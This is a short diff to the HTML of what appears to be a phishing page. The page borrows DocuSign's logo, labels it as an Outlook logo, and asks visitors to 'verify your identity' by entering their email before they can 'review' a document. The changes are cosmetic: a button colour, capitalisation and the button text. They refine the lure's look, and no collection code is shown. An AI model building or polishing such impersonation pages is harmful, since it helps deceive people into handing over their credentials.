--- a/index.html
+++ b/index.html
@@ -28,7 +28,7 @@
         }
         input, button { padding: 10px; margin-top: 10px; }
         input { width: 280px; border: 1px solid #ccc; border-radius: 5px; }
-        button { background-color: #FFFF00; color: white; border: none; cursor: pointer; border-radius: 5px; }
+        button { background-color: #FFD300; color: white; border: none; cursor: pointer; border-radius: 5px; }
         footer { 
             background: #f4f4f4; /* Footer matches the email form background */
             color: black; 
@@ -72,9 +72,9 @@
         <img src="https://docucdn-a.akamaihd.net/olive/images/2.65.0/global-assets/ds-logo-default.svg" alt="Outlook Logo" class="logo"><br>
         <h1>Email Authentication</h1>
         <p>To access this document, you will need to verify your identity.</p>
-        <p>please ensure you input the correct email </p><br><br>
+        <p>Please ensure you input the correct email </p><br>
         <input type="email" id="email" placeholder="Enter the recipient's email here."> </br></br>
-        <button onclick="validateEmail()">REVIEW DOCUMENT HERE</button>
+        <button onclick="validateEmail()">REVIEW DOCUMENT</button>
     </div>
 
     <!-- Footer -->
